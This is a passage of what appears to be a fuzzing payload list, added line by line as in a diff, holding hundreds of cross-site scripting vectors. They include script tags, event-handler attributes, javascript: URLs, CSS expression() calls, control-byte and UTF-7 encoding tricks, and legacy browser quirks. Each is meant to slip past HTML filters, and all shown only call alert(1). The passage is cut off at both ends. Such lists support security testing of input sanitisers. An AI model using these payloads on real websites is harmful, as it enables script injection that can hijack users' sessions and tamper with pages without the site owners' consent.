href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> +<script>/* *\x2A/javascript:alert(1)// */</script> +<script>/* *\x00/javascript:alert(1)// */</script> +<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> +<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> +"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF +"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF +<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> +<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> +<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> +"'`><\x00img src=xxx:x onerror=javascript:alert(1)> +<script src="data:text/plain\x2Cjavascript:alert(1)"></script> +<script src="data:\xD4\x8F,javascript:alert(1)"></script> +<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> +<script src="data:\xCB\x8F,javascript:alert(1)"></script> +<script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> +<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +script\x20type="text/javascript">javascript:alert(1);</script> +<script\x3Etype="text/javascript">javascript:alert(1);</script> +<script\x0Dtype="text/javascript">javascript:alert(1);</script> +<script\x09type="text/javascript">javascript:alert(1);</script> +<script\x0Ctype="text/javascript">javascript:alert(1);</script> +</script><script>alert(1);</script> +<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +'`"><\x3Cscript>javascript:alert(1)</script> +'`"><\x00script>javascript:alert(1)</script> +<img src=1 href=1 onerror="javascript:alert(1)"></img> +<audio src=1 href=1 onerror="javascript:alert(1)"></audio> +<video src=1 href=1 onerror="javascript:alert(1)"></video> +<body src=1 href=1 onerror="javascript:alert(1)"></body> +<image src=1 href=1 onerror="javascript:alert(1)"></image> +<object src=1 href=1 onerror="javascript:alert(1)"></object> +<script src=1 href=1 onerror="javascript:alert(1)"></script> +<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> +<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> +<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> +<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> +<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> +<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> +<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> +<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> +<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> +<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> +<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> +<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> +<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> +<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> +<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> +<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> +<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> +<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> +<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> +<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> +<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> +<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> +<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> +<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> +<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> +<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> +<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> +<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> +<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> +<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> +<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> +<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> +<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> +<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> +<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> +<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> +<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> +<object onError object onError="javascript:javascript:alert(1)"></object onError> +<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> +<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> +<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> +<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> +<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> +<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> +<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> +<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> +<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> +<body onload body 